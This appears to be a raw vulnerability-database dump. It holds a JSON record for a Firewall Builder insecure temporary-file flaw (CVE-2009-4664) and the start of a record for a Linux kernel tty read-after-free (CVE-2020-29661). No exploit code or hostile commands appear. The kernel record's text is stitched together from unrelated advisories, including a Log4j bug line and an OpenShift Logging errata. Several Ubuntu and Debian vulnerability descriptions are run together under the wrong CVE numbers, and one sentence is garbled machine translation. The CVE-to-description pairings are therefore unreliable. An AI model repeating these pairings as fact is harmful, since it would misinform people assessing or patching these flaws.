            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "VHN-42110",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:N/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-4664",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201003-033",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42110",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Firewall Builder 3.0.4, 3.0.5, and 3.0.6, when running on Linux, allows local users to gain privileges via a symlink attack on an unspecified temporary file that is created by the iptables script. Firewall Builder creates temporary files in an insecure manner. \nAn attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. \nSuccessfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files or to execute arbitrary code with elevated privileges. \nFirewall Builder 3.0.4, 3.0.5, and 3.0.6 are vulnerable; other versions may also be affected. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nFirewall Builder Insecure Temporary Files\n\nSECUNIA ADVISORY ID:\nSA36809\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36809/\n\nDESCRIPTION:\nA security issue has been reported in Firewall Builder, which can be\nexploited by malicious, local users to perform certain actions with\nescalated privileges. This\ncan be exploited to e.g. overwrite arbitrary files via symlink\nattacks. \n\nNote: Only scripts setting iptable\u0027s static routing configuration are\naffected. \n\nThe security issue is reported in versions 3.0.4, 3.0.5, and 3.0.6. \n\nSOLUTION:\nUpdate to version 3.0.7. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nhttp://blog.fwbuilder.org/2009/09/firewall-builder-v307-released.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nBackground\n==========\n\nFirewall Builder is a GUI for easy management of multiple firewall\nplatforms. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Firewall Builder users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-firewall/fwbuilder-3.0.7\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\navailable since March 09, 2010. It is likely that your system is\nalready no longer affected by this issue. \n\nReferences\n==========\n\n[ 1 ] CVE-2008-4956\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4956\n[ 2 ] CVE-2009-4664\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4664\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201201-11.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ----------------------------------------------------------------------\n\n\n\nSecunia integrated with Microsoft WSUS \nhttp://secunia.com/blog/71/\n\n\n\n----------------------------------------------------------------------\n\nTITLE:\nFedora update for fwbuilder and libfwbuilder\n\nSECUNIA ADVISORY ID:\nSA38585\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/38585/\n\nDESCRIPTION:\nFedora has issued an update for fwbuilder and libfwbuilder. \n\nFor more information:\nSA36809\n\nSOLUTION:\nApply updated packages using the yum utility (\"yum update fwbuilder\nlibfwbuilder\")",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "db": "PACKETSTORM",
        "id": "108991"
      },
      {
        "db": "PACKETSTORM",
        "id": "86386"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-4664",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "36468",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "36809",
        "trust": 1.8
      },
      {
        "db": "OSVDB",
        "id": "58247",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2010-0389",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033",
        "trust": 0.7
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2010-0157",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "53392",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-42110",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "81499",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "108991",
        "trust": 0.1
      },
      {
        "db": "SECUNIA",
        "id": "38585",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86386",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "db": "PACKETSTORM",
        "id": "108991"
      },
      {
        "db": "PACKETSTORM",
        "id": "86386"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "id": "VAR-201003-0011",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:25:55.438000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Firewall Builder Release Notes",
        "trust": 0.8,
        "url": "http://www.fwbuilder.org/4.0/docs/firewall_builder_release_notes.html#3.0.7"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://jp.redhat.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-59",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://blog.fwbuilder.org/2009/09/firewall-builder-v307-released.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035112.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/36468"
      },
      {
        "trust": 1.7,
        "url": "http://www.fwbuilder.org/docs/firewall_builder_release_notes.html#3.0.7"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=524588"
      },
      {
        "trust": 1.7,
        "url": "http://osvdb.org/58247"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/36809"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2010/0389"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53392"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4664"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-4664"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/53392"
      },
      {
        "trust": 0.3,
        "url": "http://www.fwbuilder.org/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/36809/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-4664"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4664"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/glsa/glsa-201201-11.xml"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4956"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-4956"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/71/"
      },
      {
        "trust": 0.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035113.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38585/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "db": "PACKETSTORM",
        "id": "108991"
      },
      {
        "db": "PACKETSTORM",
        "id": "86386"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "db": "PACKETSTORM",
        "id": "108991"
      },
      {
        "db": "PACKETSTORM",
        "id": "86386"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-03-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "date": "2009-09-21T00:00:00",
        "db": "BID",
        "id": "36468"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "date": "2009-09-21T14:52:16",
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "date": "2012-01-24T04:15:19",
        "db": "PACKETSTORM",
        "id": "108991"
      },
      {
        "date": "2010-02-16T17:06:59",
        "db": "PACKETSTORM",
        "id": "86386"
      },
      {
        "date": "2010-03-03T20:30:00.650000",
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "date": "2010-03-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42110"
      },
      {
        "date": "2015-04-13T21:49:00",
        "db": "BID",
        "id": "36468"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "date": "2017-08-17T01:31:42.087000",
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "date": "2010-03-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "PACKETSTORM",
        "id": "81499"
      },
      {
        "db": "PACKETSTORM",
        "id": "86386"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Firewall Builder Vulnerability gained in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "post link",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ],
    "trust": 0.6
  }
}

var-202012-1547
Vulnerability from variot

A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24. Vendors must CID-c8bcd9c5be24 It is published as.Information may be obtained. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. ========================================================================== Ubuntu Security Notice USN-4752-1 February 25, 2021

linux-oem-5.6 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-oem-5.6: Linux kernel for OEM systems

Details:

Daniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered that legacy pairing and secure-connections pairing authentication in the Bluetooth protocol could allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. A physically proximate attacker could use this to impersonate a previously paired Bluetooth device. (CVE-2020-10135)

Jay Shin discovered that the ext4 file system implementation in the Linux kernel did not properly handle directory access with broken indexing, leading to an out-of-bounds read vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-14314)

It was discovered that the block layer implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-15436)

It was discovered that the serial port driver in the Linux kernel did not properly initialize a pointer in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2020-15437)

Andy Nguyen discovered that the Bluetooth HCI event packet parser in the Linux kernel did not properly handle event advertisements of certain sizes, leading to a heap-based buffer overflow. A physically proximate remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-24490)

It was discovered that the NFS client implementation in the Linux kernel did not properly perform bounds checking before copying security labels in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25212)

It was discovered that the Rados block device (rbd) driver in the Linux kernel did not properly perform privilege checks for access to rbd devices in some situations. A local attacker could use this to map or unmap rbd block devices. A local attacker could use this to cause a denial of service. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A privileged attacker could use this to cause a denial of service (kernel memory exhaustion). A local attacker in a guest VM could possibly use this to cause a denial of service (host system crash). A local attacker could use this to possibly cause a denial of service (system crash). A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28588)

It was discovered that the framebuffer implementation in the Linux kernel did not properly perform range checks in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to gain unintended write access to read-only memory pages. (CVE-2020-29368)

Jann Horn discovered that the mmap implementation in the Linux kernel contained a race condition when handling munmap() operations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-29369)

Jann Horn discovered that the romfs file system in the Linux kernel did not properly validate file system meta-data, leading to an out-of-bounds read. An attacker could use this to construct a malicious romfs image that, when mounted, exposed sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-29661)

It was discovered that a race condition existed that caused the Linux kernel to not properly restrict exit signal delivery. A local attacker could possibly use this to send signals to arbitrary processes. (CVE-2020-35508)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.6.0-1048-oem 5.6.0-1048.52 linux-image-oem-20.04 5.6.0.1048.44

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4752-1 CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437, CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641, CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815, CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369, CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52 . Summary:

An update is now available for OpenShift Logging 5.3.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Description:

Openshift Logging Bug Fix Release (5.3.0)

Security Fix(es):

  • golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

  1. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYZJxoNzjgjWX9erEAQji2Q//bv8hVZq0D8Dz0Do5vdoPzpjDhM6wJr7U 3CqAqcxniXvHVbBiPHPsY3p3M62FSO5lg4oZnVfokEtrZmLe9ULZWLlNxVilAUCT 0urKKWCAIXF+QJcW9/KCuIfaMh8Mmvh2baq52azauCHCJ3UK9ontiGWqyUz/aq9F TM4P/eehnUU1WXAz9x4ycHP7fHZBuADkI8WOUZ5M/QpcoEvo7rLFdyat5MpMkeJx j7gGieb2ITvblxEML3LRdPljQxe56w7p2jC/EoXJnssjABozlWB936Ub/QSulGuz +HQS+RnAGxRRpNcs1wNQzpIkCFJN2S0jlEj5VLB8xLbZTYtILWhIx4rlwaFy6NJn /z7hpEfSAgmhPTejshI/2Gfu/sc+KStEJk2IasWO1wqQWRqYGVeLwgHxBt2wpX+I XJUjhkAdhAWyDfEhPXzpbN4dhmDk0QiGfL3KWZ8nO54IFQgZHT1P1YArnI1hMWC7 JhTyj1DtFOKJl8X28wf6RNui+ifD12hmIAuQRuJTPjZbTnywwpMy+Sq9mrfeHztb gPt2AqOPF5ksNB6OsjVKlMScLlLJzzlkBVgmurXaly0z2qLjy0Rl70oWeMOW4xUD 4Ravk3PLEMqSIHv0ECr4ku5ejMV1Rd46USrgVX2R0CALXIxPkk1IEN8hHmzIGz2D HHJuAvrlroc= =di1X -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . If you are running a kernel version earlier than the one listed below, please upgrade your kernel as soon as possible. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


Debian Security Advisory DSA-4843-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso February 01, 2021 https://www.debian.org/security/faq


Package : linux CVE ID : CVE-2020-27815 CVE-2020-27825 CVE-2020-27830 CVE-2020-28374 CVE-2020-29568 CVE-2020-29569 CVE-2020-29660 CVE-2020-29661 CVE-2020-36158 CVE-2021-3347 CVE-2021-20177 Debian Bug : 970736 972345 977048 977615

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2020-27825

Adam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace
ring buffer resizing logic due to a race condition, which could
result in denial of service or information leak.

CVE-2020-27830

Shisong Qin reported a NULL pointer dereference flaw in the Speakup
screen reader core driver.

CVE-2020-28374

David Disseldorp discovered that the LIO SCSI target implementation
performed insufficient checking in certain XCOPY requests. An
attacker with access to a LUN and knowledge of Unit Serial Number
assignments can take advantage of this flaw to read and write to any
LIO backstore, regardless of the SCSI transport settings.

CVE-2020-29568 (XSA-349)

Michael Kurth and Pawel Wieczorkiewicz reported that frontends can
trigger OOM in backends by updating a watched path. A
misbehaving guest can trigger a dom0 crash by continuously
connecting / disconnecting a block frontend.

CVE-2020-36158

A buffer overflow flaw was discovered in the mwifiex WiFi driver
which could result in denial of service or the execution of
arbitrary code via a long SSID value. A privileged user (with root or CAP_NET_ADMIN) can
take advantage of this flaw to cause a kernel panic when inserting
iptables rules.

For the stable distribution (buster), these problems have been fixed in version 4.19.171-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAXj9pfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Tf5Q//RdQojeX7VtJ61PsVXRszZh9DJ3PUo64NheFU+QWUYO7F6NUD3fMxiS9K I8Sgfsm28x7RBambjW6TZYseJhQd9aSvaANnPdUj/eZ9P3xBhXFM8wzISosUWgfO 2IIV40oOVj943+BzfIQiq1mgQtwLjh3pNTZAEpjnzD96Tc9tXGyW9/3iGkUHIQjv gUTSvoLIUAI4XfNNUjnok+6kPDyEEIdiwJaGDG+UPZ6HNL/hrG3A4klQc+X7KK5K NCOzl4Wl5pZN7u2Ietn3sFMsNJkMrsfLlVyj8J9PgNwbFQh/+RuvzFcONlQ8iaD9 kx42gkLwjl+hM2UeCpvQndzwqXKPKc6CjFemDj7KWzVA+KkVBRTXCGb9K9CasZOZ 0e/cu+5rjYGubIE3e/jo3Gmhp/fm9fXHESbruxuP+gjdbKcyrGrokNucjRvp6FPP rCX+e7OjsZwWGBIcAw+gDAZkDO7PFEoRtlByF2LmxxNvTufZQZHX8NwVyABCdpZi VQLLeQNXN1pJ4d1NPWgTlKfEmH0sGVQRHCliTkBZmIjvo+y1JClUDBAlWOS4YYQL 4Z4oe1qtOX9z+NkqDqcbgfWw69Q2PipNN3TR5YcBXvOtVhvL+/WFGiooJDqxkdCD j3wO/r/1gut/bK/OJnjmOB9J5OXP+cHxYtrhPqXFy2Hzkgj1CRU= =u23W -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
